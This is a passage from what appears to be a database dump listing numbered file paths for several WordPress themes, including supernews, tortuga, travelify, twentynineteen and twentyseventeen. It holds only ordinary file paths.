acmethemes/core/jetpack.php'),(5261,'wp-content/themes/supernews/acmethemes/core/js/customizer.js'),(5262,'wp-content/themes/supernews/acmethemes/core/template-tags.php'),(5263,'wp-content/themes/supernews/acmethemes/core.php'),(5264,'wp-content/themes/supernews/acmethemes/customizer/custom-controls.php'),(5265,'wp-content/themes/supernews/acmethemes/customizer/customizer-core.php'),(5266,'wp-content/themes/supernews/acmethemes/customizer/customizer.php'),(5267,'wp-content/themes/supernews/acmethemes/customizer/design-options/background-image.php'),(5268,'wp-content/themes/supernews/acmethemes/customizer/design-options/blog-layout.php'),(5269,'wp-content/themes/supernews/acmethemes/customizer/design-options/colors-options.php'),(5270,'wp-content/themes/supernews/acmethemes/customizer/design-options/custom-css.php'),(5271,'wp-content/themes/supernews/acmethemes/customizer/design-options/design-panel.php'),(5272,'wp-content/themes/supernews/acmethemes/customizer/design-options/sidebar-layout.php'),(5273,'wp-content/themes/supernews/acmethemes/customizer/feature-section/feature-category.php'),(5274,'wp-content/themes/supernews/acmethemes/customizer/feature-section/feature-enable.php'),(5275,'wp-content/themes/supernews/acmethemes/customizer/feature-section/feature-panel.php'),(5276,'wp-content/themes/supernews/acmethemes/customizer/footer-section/footer-section.php'),(5277,'wp-content/themes/supernews/acmethemes/customizer/header-options/ad-option.php'),(5278,'wp-content/themes/supernews/acmethemes/customizer/header-options/header-date.php'),(5279,'wp-content/themes/supernews/acmethemes/customizer/header-options/header-logo.php'),(5280,'wp-content/themes/supernews/acmethemes/customizer/header-options/header-news.php'),(5281,'wp-content/themes/supernews/acmethemes/customizer/header-options/header-panel.php'),(5282,'wp-content/themes/supernews/acmethemes/customizer/header-options/search-option.php'),(5283,'wp-content/themes/supernews/acmethemes/customizer/header-options/social-options.php'),(5284,'wp-content/themes/supernews/acmethemes/customizer/options/breadcrumb.php'),(5285,'wp-content/themes/supernews/acmethemes/customizer/options/options-panel.php'),(5286,'wp-content/themes/supernews/acmethemes/customizer/options/options-reset.php'),(5287,'wp-content/themes/supernews/acmethemes/customizer/options/search.php'),(5288,'wp-content/themes/supernews/acmethemes/customizer/sanitize-functions.php'),(5289,'wp-content/themes/supernews/acmethemes/customizer/single-posts/single-post-section.php'),(5290,'wp-content/themes/supernews/acmethemes/functions.php'),(5291,'wp-content/themes/supernews/acmethemes/hooks/comment-forms.php'),(5292,'wp-content/themes/supernews/acmethemes/hooks/dynamic-css.php'),(5293,'wp-content/themes/supernews/acmethemes/hooks/excerpts.php'),(5294,'wp-content/themes/supernews/acmethemes/hooks/footer.php'),(5295,'wp-content/themes/supernews/acmethemes/hooks/front-page.php'),(5296,'wp-content/themes/supernews/acmethemes/hooks/header.php'),(5297,'wp-content/themes/supernews/acmethemes/hooks/related-posts.php'),(5298,'wp-content/themes/supernews/acmethemes/hooks/slider-selection.php'),(5299,'wp-content/themes/supernews/acmethemes/hooks/social-links.php'),(5300,'wp-content/themes/supernews/acmethemes/init.php'),(5301,'wp-content/themes/supernews/acmethemes/sidebar-widget/acme-ad.php'),(5302,'wp-content/themes/supernews/acmethemes/sidebar-widget/acme-col-posts.php'),(5303,'wp-content/themes/supernews/acmethemes/sidebar-widget/sidebar.php'),(5304,'wp-content/themes/supernews/archive.php'),(5305,'wp-content/themes/supernews/assets/css/supernews-customizer.css'),(5306,'wp-content/themes/supernews/assets/img/no-image-240-172.png'),(5307,'wp-content/themes/supernews/assets/img/no-image-500-280.png'),(5308,'wp-content/themes/supernews/assets/img/no-image-660-365.png'),(5309,'wp-content/themes/supernews/assets/img/no-image-840-480.png'),(5310,'wp-content/themes/supernews/assets/js/acme-widget.js'),(5311,'wp-content/themes/supernews/assets/js/supernews-custom.js'),(5312,'wp-content/themes/supernews/assets/js/supernews-customizer.js'),(5313,'wp-content/themes/supernews/assets/library/Font-Awesome/css/font-awesome.css'),(5314,'wp-content/themes/supernews/assets/library/Font-Awesome/css/font-awesome.min.css'),(5315,'wp-content/themes/supernews/assets/library/Font-Awesome/fonts/FontAwesome.otf'),(5316,'wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.eot'),(5317,'wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.svg'),(5318,'wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.ttf'),(5319,'wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.woff'),(5320,'wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.woff2'),(5321,'wp-content/themes/supernews/assets/library/SlickNav/jquery.slicknav.js'),(5322,'wp-content/themes/supernews/assets/library/SlickNav/jquery.slicknav.min.js'),(5323,'wp-content/themes/supernews/assets/library/bxslider/css/jquery.bxslider.css'),(5324,'wp-content/themes/supernews/assets/library/bxslider/css/jquery.bxslider.min.css'),(5325,'wp-content/themes/supernews/assets/library/bxslider/images/bx_loader.gif'),(5326,'wp-content/themes/supernews/assets/library/bxslider/images/controls.png'),(5327,'wp-content/themes/supernews/assets/library/bxslider/js/jquery.bxslider.js'),(5328,'wp-content/themes/supernews/assets/library/bxslider/js/jquery.bxslider.min.js'),(5329,'wp-content/themes/supernews/assets/library/html5shiv/html5shiv.js'),(5330,'wp-content/themes/supernews/assets/library/html5shiv/html5shiv.min.js'),(5331,'wp-content/themes/supernews/assets/library/respond/respond.js'),(5332,'wp-content/themes/supernews/assets/library/respond/respond.min.js'),(5333,'wp-content/themes/supernews/changelog.txt'),(5334,'wp-content/themes/supernews/comments.php'),(5335,'wp-content/themes/supernews/footer.php'),(5336,'wp-content/themes/supernews/front-page.php'),(5337,'wp-content/themes/supernews/functions.php'),(5338,'wp-content/themes/supernews/header.php'),(5339,'wp-content/themes/supernews/index.php'),(5340,'wp-content/themes/supernews/languages/supernews.pot'),(5341,'wp-content/themes/supernews/page.php'),(5342,'wp-content/themes/supernews/readme.txt'),(5343,'wp-content/themes/supernews/screenshot.jpg'),(5344,'wp-content/themes/supernews/search.php'),(5345,'wp-content/themes/supernews/searchform.php'),(5346,'wp-content/themes/supernews/sidebar-left.php'),(5347,'wp-content/themes/supernews/sidebar.php'),(5348,'wp-content/themes/supernews/single.php'),(5349,'wp-content/themes/supernews/style.css'),(5350,'wp-content/themes/supernews/template-parts/content-none.php'),(5351,'wp-content/themes/supernews/template-parts/content-page.php'),(5352,'wp-content/themes/supernews/template-parts/content-search.php'),(5353,'wp-content/themes/supernews/template-parts/content-single.php'),(5354,'wp-content/themes/supernews/template-parts/content.php'),(5355,'wp-content/themes/the-minimal/404.php'),(5356,'wp-content/themes/the-minimal/archive.php'),(5357,'wp-content/themes/the-minimal/comments.php'),(5358,'wp-content/themes/the-minimal/css/bootstrap.css'),(5359,'wp-content/themes/the-minimal/css/flexslider.css'),(5360,'wp-content/themes/the-minimal/css/font-awesome.css'),(5361,'wp-content/themes/the-minimal/css/meanmenu.css'),(5362,'wp-content/themes/the-minimal/fonts/FontAwesome.otf'),(5363,'wp-content/themes/the-minimal/fonts/fontawesome-webfont.eot'),(5364,'wp-content/themes/the-minimal/fonts/fontawesome-webfont.svg'),(5365,'wp-content/themes/the-minimal/fonts/fontawesome-webfont.ttf'),(5366,'wp-content/themes/the-minimal/fonts/fontawesome-webfont.woff'),(5367,'wp-content/themes/the-minimal/fonts/fontawesome-webfont.woff2'),(5368,'wp-content/themes/the-minimal/footer.php'),(5369,'wp-content/themes/the-minimal/functions.php'),(5370,'wp-content/themes/the-minimal/header.php'),(5371,'wp-content/themes/the-minimal/images/archive-img.png'),(5372,'wp-content/themes/the-minimal/images/blockquote-img.png'),(5373,'wp-content/themes/the-minimal/images/checkbox-active.png'),(5374,'wp-content/themes/the-minimal/images/checkbox.png'),(5375,'wp-content/themes/the-minimal/images/comment-icon.png'),(5376,'wp-content/themes/the-minimal/images/date-icon.png'),(5377,'wp-content/themes/the-minimal/images/date-icon2.png'),(5378,'wp-content/themes/the-minimal/images/date-icon3.png'),(5379,'wp-content/themes/the-minimal/images/file-icon.png'),(5380,'wp-content/themes/the-minimal/images/form-select-option-img.png'),(5381,'wp-content/themes/the-minimal/images/list-style-type.png'),(5382,'wp-content/themes/the-minimal/images/next.png'),(5383,'wp-content/themes/the-minimal/images/next2.png'),(5384,'wp-content/themes/the-minimal/images/no-sidebar.png'),(5385,'wp-content/themes/the-minimal/images/person-icon.png'),(5386,'wp-content/themes/the-minimal/images/prev.png'),(5387,'wp-content/themes/the-minimal/images/prev2.png'),(5388,'wp-content/themes/the-minimal/images/quote-icon.png'),(5389,'wp-content/themes/the-minimal/images/quote-icon2.png'),(5390,'wp-content/themes/the-minimal/images/right-sidebar.png'),(5391,'wp-content/themes/the-minimal/images/search-icon.png'),(5392,'wp-content/themes/the-minimal/images/search-icon2.png'),(5393,'wp-content/themes/the-minimal/images/tag-icon.png'),(5394,'wp-content/themes/the-minimal/images/upgrade.png'),(5395,'wp-content/themes/the-minimal/inc/css/admin.css'),(5396,'wp-content/themes/the-minimal/inc/customizer.php'),(5397,'wp-content/themes/the-minimal/inc/extras.php'),(5398,'wp-content/themes/the-minimal/inc/info.php'),(5399,'wp-content/themes/the-minimal/inc/jetpack.php'),(5400,'wp-content/themes/the-minimal/inc/js/admin.js'),(5401,'wp-content/themes/the-minimal/inc/metabox.php'),(5402,'wp-content/themes/the-minimal/inc/template-tags.php'),(5403,'wp-content/themes/the-minimal/inc/widget-featured-post.php'),(5404,'wp-content/themes/the-minimal/inc/widget-popular-post.php'),(5405,'wp-content/themes/the-minimal/inc/widget-recent-post.php'),(5406,'wp-content/themes/the-minimal/inc/widget-social-links.php'),(5407,'wp-content/themes/the-minimal/index.php'),(5408,'wp-content/themes/the-minimal/js/bootstrap.js'),(5409,'wp-content/themes/the-minimal/js/custom.js'),(5410,'wp-content/themes/the-minimal/js/customizer.js'),(5411,'wp-content/themes/the-minimal/js/jquery.flexslider.js'),(5412,'wp-content/themes/the-minimal/js/jquery.meanmenu.js'),(5413,'wp-content/themes/the-minimal/languages/readme.txt'),(5414,'wp-content/themes/the-minimal/languages/the-minimal.pot'),(5415,'wp-content/themes/the-minimal/page.php'),(5416,'wp-content/themes/the-minimal/readme.txt'),(5417,'wp-content/themes/the-minimal/screenshot.png'),(5418,'wp-content/themes/the-minimal/search.php'),(5419,'wp-content/themes/the-minimal/sidebar.php'),(5420,'wp-content/themes/the-minimal/single.php'),(5421,'wp-content/themes/the-minimal/style.css'),(5422,'wp-content/themes/the-minimal/template-parts/content-none.php'),(5423,'wp-content/themes/the-minimal/template-parts/content-page.php'),(5424,'wp-content/themes/the-minimal/template-parts/content-search.php'),(5425,'wp-content/themes/the-minimal/template-parts/content.php'),(5426,'wp-content/themes/tortuga/404.php'),(5427,'wp-content/themes/tortuga/archive.php'),(5428,'wp-content/themes/tortuga/comments.php'),(5429,'wp-content/themes/tortuga/css/customizer.css'),(5430,'wp-content/themes/tortuga/css/editor-style.css'),(5431,'wp-content/themes/tortuga/css/flexslider.css'),(5432,'wp-content/themes/tortuga/css/genericons/Genericons.eot'),(5433,'wp-content/themes/tortuga/css/genericons/Genericons.svg'),(5434,'wp-content/themes/tortuga/css/genericons/Genericons.ttf'),(5435,'wp-content/themes/tortuga/css/genericons/Genericons.woff'),(5436,'wp-content/themes/tortuga/css/genericons/genericons.css'),(5437,'wp-content/themes/tortuga/css/theme-info.css'),(5438,'wp-content/themes/tortuga/css/themezee-related-posts.css'),(5439,'wp-content/themes/tortuga/css/themezee-widget-bundle.css'),(5440,'wp-content/themes/tortuga/footer.php'),(5441,'wp-content/themes/tortuga/functions.php'),(5442,'wp-content/themes/tortuga/header.php'),(5443,'wp-content/themes/tortuga/home.php'),(5444,'wp-content/themes/tortuga/images/default-slider-image.png'),(5445,'wp-content/themes/tortuga/inc/addons.php'),(5446,'wp-content/themes/tortuga/inc/back-compat.php'),(5447,'wp-content/themes/tortuga/inc/customizer/customizer.php'),(5448,'wp-content/themes/tortuga/inc/customizer/default-options.php'),(5449,'wp-content/themes/tortuga/inc/customizer/functions/callback-functions.php'),(5450,'wp-content/themes/tortuga/inc/customizer/functions/custom-controls.php'),(5451,'wp-content/themes/tortuga/inc/customizer/functions/sanitize-functions.php'),(5452,'wp-content/themes/tortuga/inc/customizer/sections/customizer-general.php'),(5453,'wp-content/themes/tortuga/inc/customizer/sections/customizer-post.php'),(5454,'wp-content/themes/tortuga/inc/customizer/sections/customizer-slider.php'),(5455,'wp-content/themes/tortuga/inc/customizer/sections/customizer-upgrade.php'),(5456,'wp-content/themes/tortuga/inc/extras.php'),(5457,'wp-content/themes/tortuga/inc/slider.php'),(5458,'wp-content/themes/tortuga/inc/template-tags.php'),(5459,'wp-content/themes/tortuga/inc/theme-info.php'),(5460,'wp-content/themes/tortuga/inc/widgets/widget-magazine-posts-boxed.php'),(5461,'wp-content/themes/tortuga/inc/widgets/widget-magazine-posts-columns.php'),(5462,'wp-content/themes/tortuga/inc/widgets/widget-magazine-posts-grid.php'),(5463,'wp-content/themes/tortuga/index.php'),(5464,'wp-content/themes/tortuga/js/customizer.js'),(5465,'wp-content/themes/tortuga/js/html5shiv.js'),(5466,'wp-content/themes/tortuga/js/html5shiv.min.js'),(5467,'wp-content/themes/tortuga/js/jquery.flexslider-min.js'),(5468,'wp-content/themes/tortuga/js/jquery.flexslider.js'),(5469,'wp-content/themes/tortuga/js/navigation.js'),(5470,'wp-content/themes/tortuga/js/slider.js'),(5471,'wp-content/themes/tortuga/languages/readme.txt'),(5472,'wp-content/themes/tortuga/languages/tortuga.pot'),(5473,'wp-content/themes/tortuga/page.php'),(5474,'wp-content/themes/tortuga/readme.txt'),(5475,'wp-content/themes/tortuga/rtl.css'),(5476,'wp-content/themes/tortuga/screenshot.jpg'),(5477,'wp-content/themes/tortuga/search.php'),(5478,'wp-content/themes/tortuga/searchform.php'),(5479,'wp-content/themes/tortuga/sidebar.php'),(5480,'wp-content/themes/tortuga/single.php'),(5481,'wp-content/themes/tortuga/style.css'),(5482,'wp-content/themes/tortuga/template-fullwidth.php'),(5483,'wp-content/themes/tortuga/template-magazine.php'),(5484,'wp-content/themes/tortuga/template-parts/content-none.php'),(5485,'wp-content/themes/tortuga/template-parts/content-page.php'),(5486,'wp-content/themes/tortuga/template-parts/content-search.php'),(5487,'wp-content/themes/tortuga/template-parts/content-single.php'),(5488,'wp-content/themes/tortuga/template-parts/content-slider.php'),(5489,'wp-content/themes/tortuga/template-parts/content.php'),(5490,'wp-content/themes/tortuga/template-parts/post-slider.php'),(5491,'wp-content/themes/tortuga/template-slider.php'),(5492,'wp-content/themes/travelify/404.php'),(5493,'wp-content/themes/travelify/README.md'),(5494,'wp-content/themes/travelify/archive.php'),(5495,'wp-content/themes/travelify/comments.php'),(5496,'wp-content/themes/travelify/content-leftsidebar.php'),(5497,'wp-content/themes/travelify/content-nosidebar.php'),(5498,'wp-content/themes/travelify/content-rightsidebar.php'),(5499,'wp-content/themes/travelify/editor-style.css'),(5500,'wp-content/themes/travelify/footer.php'),(5501,'wp-content/themes/travelify/functions.php'),(5502,'wp-content/themes/travelify/header.php'),(5503,'wp-content/themes/travelify/images/arrow-right.png'),(5504,'wp-content/themes/travelify/images/background.png'),(5505,'wp-content/themes/travelify/index.php'),(5506,'wp-content/themes/travelify/languages/bg_BG.mo'),(5507,'wp-content/themes/travelify/languages/bg_BG.po'),(5508,'wp-content/themes/travelify/languages/de_DE.mo'),(5509,'wp-content/themes/travelify/languages/de_DE.po'),(5510,'wp-content/themes/travelify/languages/el.mo'),(5511,'wp-content/themes/travelify/languages/el.po'),(5512,'wp-content/themes/travelify/languages/es_ES.mo'),(5513,'wp-content/themes/travelify/languages/es_ES.po'),(5514,'wp-content/themes/travelify/languages/fa_IR.mo'),(5515,'wp-content/themes/travelify/languages/fa_IR.po'),(5516,'wp-content/themes/travelify/languages/fi.mo'),(5517,'wp-content/themes/travelify/languages/fi.po'),(5518,'wp-content/themes/travelify/languages/fr_FR.mo'),(5519,'wp-content/themes/travelify/languages/fr_FR.po'),(5520,'wp-content/themes/travelify/languages/he_IL.mo'),(5521,'wp-content/themes/travelify/languages/he_IL.po'),(5522,'wp-content/themes/travelify/languages/hu_HU.mo'),(5523,'wp-content/themes/travelify/languages/hu_HU.po'),(5524,'wp-content/themes/travelify/languages/it_IT.mo'),(5525,'wp-content/themes/travelify/languages/it_IT.po'),(5526,'wp-content/themes/travelify/languages/nl_NL.mo'),(5527,'wp-content/themes/travelify/languages/nl_NL.po'),(5528,'wp-content/themes/travelify/languages/pl_PL.mo'),(5529,'wp-content/themes/travelify/languages/pl_PL.po'),(5530,'wp-content/themes/travelify/languages/pt_BR.mo'),(5531,'wp-content/themes/travelify/languages/pt_BR.po'),(5532,'wp-content/themes/travelify/languages/pt_PT.mo'),(5533,'wp-content/themes/travelify/languages/pt_PT.po'),(5534,'wp-content/themes/travelify/languages/ru_RU.mo'),(5535,'wp-content/themes/travelify/languages/ru_RU.po'),(5536,'wp-content/themes/travelify/languages/sk_SK.mo'),(5537,'wp-content/themes/travelify/languages/sk_SK.po'),(5538,'wp-content/themes/travelify/languages/sv_SE.mo'),(5539,'wp-content/themes/travelify/languages/sv_SE.po'),(5540,'wp-content/themes/travelify/languages/tr_TR.mo'),(5541,'wp-content/themes/travelify/languages/tr_TR.po'),(5542,'wp-content/themes/travelify/languages/travelify.pot'),(5543,'wp-content/themes/travelify/languages/zh_CN.mo'),(5544,'wp-content/themes/travelify/languages/zh_CN.po'),(5545,'wp-content/themes/travelify/library/font/Genericons.eot'),(5546,'wp-content/themes/travelify/library/font/Genericons.svg'),(5547,'wp-content/themes/travelify/library/font/Genericons.ttf'),(5548,'wp-content/themes/travelify/library/font/Genericons.woff'),(5549,'wp-content/themes/travelify/library/functions/customizer.php'),(5550,'wp-content/themes/travelify/library/functions/functions.php'),(5551,'wp-content/themes/travelify/library/functions/i18n.php'),(5552,'wp-content/themes/travelify/library/functions/shortcodes.php'),(5553,'wp-content/themes/travelify/library/js/customizer.js'),(5554,'wp-content/themes/travelify/library/js/customizer_custom.js'),(5555,'wp-content/themes/travelify/library/js/functions.min.js'),(5556,'wp-content/themes/travelify/library/js/html5.js'),(5557,'wp-content/themes/travelify/library/js/jquery-cloneya.min.js'),(5558,'wp-content/themes/travelify/library/js/jquery.cycle.all.min.js'),(5559,'wp-content/themes/travelify/library/js/slider-settings.min.js'),(5560,'wp-content/themes/travelify/library/panel/images/arrow-dark.png'),(5561,'wp-content/themes/travelify/library/panel/images/arrow-light.png'),(5562,'wp-content/themes/travelify/library/panel/images/left-sidebar.png'),(5563,'wp-content/themes/travelify/library/panel/images/logo.png'),(5564,'wp-content/themes/travelify/library/panel/images/no-sidebar-fullwidth.png'),(5565,'wp-content/themes/travelify/library/panel/images/no-sidebar.png'),(5566,'wp-content/themes/travelify/library/panel/images/one-column.png'),(5567,'wp-content/themes/travelify/library/panel/images/right-sidebar.png'),(5568,'wp-content/themes/travelify/library/panel/metaboxes.php'),(5569,'wp-content/themes/travelify/library/panel/show-post-id.php'),(5570,'wp-content/themes/travelify/library/panel/themeoptions-defaults.php'),(5571,'wp-content/themes/travelify/library/panel/travelify-custom-control.php'),(5572,'wp-content/themes/travelify/library/structure/content-extensions.php'),(5573,'wp-content/themes/travelify/library/structure/footer-extensions.php'),(5574,'wp-content/themes/travelify/library/structure/header-extensions.php'),(5575,'wp-content/themes/travelify/library/structure/sidebar-extensions.php'),(5576,'wp-content/themes/travelify/library/tgmpa/class-tgm-plugin-activation.php'),(5577,'wp-content/themes/travelify/library/tgmpa/tgm-plugin-activation.php'),(5578,'wp-content/themes/travelify/license.txt'),(5579,'wp-content/themes/travelify/page.php'),(5580,'wp-content/themes/travelify/readme.txt'),(5581,'wp-content/themes/travelify/rtl.css'),(5582,'wp-content/themes/travelify/screenshot.png'),(5583,'wp-content/themes/travelify/search.php'),(5584,'wp-content/themes/travelify/searchform.php'),(5585,'wp-content/themes/travelify/sidebar-footer.php'),(5586,'wp-content/themes/travelify/sidebar-left.php'),(5587,'wp-content/themes/travelify/sidebar-right.php'),(5588,'wp-content/themes/travelify/sidebar.php'),(5589,'wp-content/themes/travelify/single.php'),(5590,'wp-content/themes/travelify/style.css'),(5591,'wp-content/themes/travelify/templates/template-blog-full-content.php'),(5592,'wp-content/themes/travelify/templates/template-blog-large-image.php'),(5593,'wp-content/themes/travelify/templates/template-blog-medium-image.php'),(5594,'wp-content/themes/travelify/wpml-config.xml'),(5595,'wp-content/themes/twentynineteen/404.php'),(5596,'wp-content/themes/twentynineteen/archive.php'),(5597,'wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php'),(5598,'wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php'),(5599,'wp-content/themes/twentynineteen/comments.php'),(5600,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff'),(5601,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2'),(5602,'wp-content/themes/twentynineteen/footer.php'),(5603,'wp-content/themes/twentynineteen/functions.php'),(5604,'wp-content/themes/twentynineteen/header.php'),(5605,'wp-content/themes/twentynineteen/image.php'),(5606,'wp-content/themes/twentynineteen/images/pattern_01.jpg'),(5607,'wp-content/themes/twentynineteen/images/pattern_02.jpg'),(5608,'wp-content/themes/twentynineteen/images/pattern_03.jpg'),(5609,'wp-content/themes/twentynineteen/images/pattern_04.jpg'),(5610,'wp-content/themes/twentynineteen/inc/back-compat.php'),(5611,'wp-content/themes/twentynineteen/inc/block-patterns.php'),(5612,'wp-content/themes/twentynineteen/inc/color-patterns.php'),(5613,'wp-content/themes/twentynineteen/inc/customizer.php'),(5614,'wp-content/themes/twentynineteen/inc/helper-functions.php'),(5615,'wp-content/themes/twentynineteen/inc/icon-functions.php'),(5616,'wp-content/themes/twentynineteen/inc/template-functions.php'),(5617,'wp-content/themes/twentynineteen/inc/template-tags.php'),(5618,'wp-content/themes/twentynineteen/index.php'),(5619,'wp-content/themes/twentynineteen/js/customize-controls.js'),(5620,'wp-content/themes/twentynineteen/js/customize-preview.js'),(5621,'wp-content/themes/twentynineteen/js/priority-menu.js'),(5622,'wp-content/themes/twentynineteen/js/skip-link-focus-fix.js'),(5623,'wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js'),(5624,'wp-content/themes/twentynineteen/package-lock.json'),(5625,'wp-content/themes/twentynineteen/package.json'),(5626,'wp-content/themes/twentynineteen/page.php'),(5627,'wp-content/themes/twentynineteen/postcss.config.js'),(5628,'wp-content/themes/twentynineteen/print.css'),(5629,'wp-content/themes/twentynineteen/print.scss'),(5630,'wp-content/themes/twentynineteen/readme.txt'),(5631,'wp-content/themes/twentynineteen/sass/_normalize.scss'),(5632,'wp-content/themes/twentynineteen/sass/blocks/_blocks.scss'),(5633,'wp-content/themes/twentynineteen/sass/elements/_elements.scss'),(5634,'wp-content/themes/twentynineteen/sass/elements/_lists.scss'),(5635,'wp-content/themes/twentynineteen/sass/elements/_tables.scss'),(5636,'wp-content/themes/twentynineteen/sass/forms/_buttons.scss'),(5637,'wp-content/themes/twentynineteen/sass/forms/_fields.scss'),(5638,'wp-content/themes/twentynineteen/sass/forms/_forms.scss'),(5639,'wp-content/themes/twentynineteen/sass/layout/_layout.scss'),(5640,'wp-content/themes/twentynineteen/sass/media/_captions.scss'),(5641,'wp-content/themes/twentynineteen/sass/media/_galleries.scss'),(5642,'wp-content/themes/twentynineteen/sass/media/_media.scss'),(5643,'wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss'),(5644,'wp-content/themes/twentynineteen/sass/mixins/_utilities.scss'),(5645,'wp-content/themes/twentynineteen/sass/modules/_accessibility.scss'),(5646,'wp-content/themes/twentynineteen/sass/modules/_alignments.scss'),(5647,'wp-content/themes/twentynineteen/sass/modules/_clearings.scss'),(5648,'wp-content/themes/twentynineteen/sass/navigation/_links.scss'),(5649,'wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss'),(5650,'wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss'),(5651,'wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss'),(5652,'wp-content/themes/twentynineteen/sass/navigation/_navigation.scss'),(5653,'wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss'),(5654,'wp-content/themes/twentynineteen/sass/site/_site.scss'),(5655,'wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss'),(5656,'wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss'),(5657,'wp-content/themes/twentynineteen/sass/site/header/_site-header.scss'),(5658,'wp-content/themes/twentynineteen/sass/site/primary/_archives.scss'),(5659,'wp-content/themes/twentynineteen/sass/site/primary/_comments.scss'),(5660,'wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss'),(5661,'wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss'),(5662,'wp-content/themes/twentynineteen/sass/typography/_copy.scss'),(5663,'wp-content/themes/twentynineteen/sass/typography/_headings.scss'),(5664,'wp-content/themes/twentynineteen/sass/typography/_typography.scss'),(5665,'wp-content/themes/twentynineteen/sass/variables-site/_colors.scss'),(5666,'wp-content/themes/twentynineteen/sass/variables-site/_columns.scss'),(5667,'wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss'),(5668,'wp-content/themes/twentynineteen/sass/variables-site/_structure.scss'),(5669,'wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss'),(5670,'wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss'),(5671,'wp-content/themes/twentynineteen/screenshot.png'),(5672,'wp-content/themes/twentynineteen/search.php'),(5673,'wp-content/themes/twentynineteen/single.php'),(5674,'wp-content/themes/twentynineteen/style-editor-customizer.css'),(5675,'wp-content/themes/twentynineteen/style-editor-customizer.scss'),(5676,'wp-content/themes/twentynineteen/style-editor.css'),(5677,'wp-content/themes/twentynineteen/style-editor.scss'),(5678,'wp-content/themes/twentynineteen/style-rtl.css'),(5679,'wp-content/themes/twentynineteen/style.css'),(5680,'wp-content/themes/twentynineteen/style.scss'),(5681,'wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php'),(5682,'wp-content/themes/twentynineteen/template-parts/content/content-none.php'),(5683,'wp-content/themes/twentynineteen/template-parts/content/content-page.php'),(5684,'wp-content/themes/twentynineteen/template-parts/content/content-single.php'),(5685,'wp-content/themes/twentynineteen/template-parts/content/content.php'),(5686,'wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php'),(5687,'wp-content/themes/twentynineteen/template-parts/header/entry-header.php'),(5688,'wp-content/themes/twentynineteen/template-parts/header/site-branding.php'),(5689,'wp-content/themes/twentynineteen/template-parts/post/author-bio.php'),(5690,'wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php'),(5691,'wp-content/themes/twentyseventeen/404.php'),(5692,'wp-content/themes/twentyseventeen/README.txt'),(5693,'wp-content/themes/twentyseventeen/archive.php'),(5694,'wp-content/themes/twentyseventeen/assets/css/colors-dark.css'),(5695,'wp-content/themes/twentyseventeen/assets/css/editor-style.css'),(5696,'wp-content/themes/twentyseventeen/assets/css/ie8.css'),(5697,'wp-content/themes/twentyseventeen/assets/css/ie9.css'),(5698,'wp-content/themes/twentyseventeen/assets/images/coffee.jpg'),(5699,'wp-content/themes/twentyseventeen/assets/images/espresso.jpg'),(5700,'wp-content/themes/twentyseventeen/assets/images/header.jpg'),(5701,'wp-content/themes/twentyseventeen/assets/images/sandwich.jpg'),(5702,'wp-content/themes/twentyseventeen/assets/images/svg-icons.svg'),(5703,'wp-content/themes/twentyseventeen/assets/js/customize-controls.js'),(5704,'wp-content/themes/twentyseventeen/assets/js/customize-preview.js'),(5705,'wp-content/themes/twentyseventeen/assets/js/global.js'),(5706,'wp-content/themes/twentyseventeen/assets/js/html5.js'),(5707,'wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js'),(5708,'wp-content/themes/twentyseventeen/assets/js/navigation.js'),(5709,'wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js'),(5710,'wp-content/themes/twentyseventeen/comments.php'),(5711,'wp-content/themes/twentyseventeen/footer.php'),(5712,'wp-content/themes/twentyseventeen/front-page.php'),(5713,'wp-content/themes/twentyseventeen/functions.php'),(5714,'wp-content/themes/twentyseventeen/header.php'),(5715,'wp-content/themes/twentyseventeen/inc/back-compat.php'),(5716,'wp-content/themes/twentyseventeen/inc/color-patterns.php'),(5717,'wp-content/themes/twentyseventeen/inc/custom-header.php'),(5718,'wp-content/themes/twentyseventeen/inc/customizer.php'),(5719,'wp-content/themes/twentyseventeen/inc/icon-functions.php'),(5720,'wp-content/themes/twentyseventeen/inc/template-functions.php'),(5721,'wp-content/themes/twentyseventeen/inc/template-tags.php'),(5722,'wp-content/themes/twentyseventeen/index.php'),(5723,'wp-content/themes/twentyseventeen/page.php'),(5724,'wp-content/themes/twentyseventeen/rtl.css'),(5725,'wp-content/themes/twentyseventeen/screenshot.png'),(5726,'wp-content/themes/twentyseventeen/search.php'),(5727,'wp-content/themes/twentyseventeen/searchform.php'),(5728,'wp-content/themes/twentyseventeen/sidebar.php'),(5729,'wp-content/themes/twentyseventeen/single.php'),(5730,'wp-content/themes/twentyseventeen/style.css'),(5731,'wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php'),(5732,'wp-content/themes/twentyseventeen/template-parts/footer/site-info.php'),(5733,'wp-content/themes/twentyseventeen/template-parts/header/header-image.php'),(5734,'wp-content/themes/twentyseventeen/template-parts/header/site-branding.php'),(5735,'wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php'),(5736,'wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php'),(5737,'wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php'),(5738,'wp-content/themes/twentyseventeen/template-parts/page/content-page.php'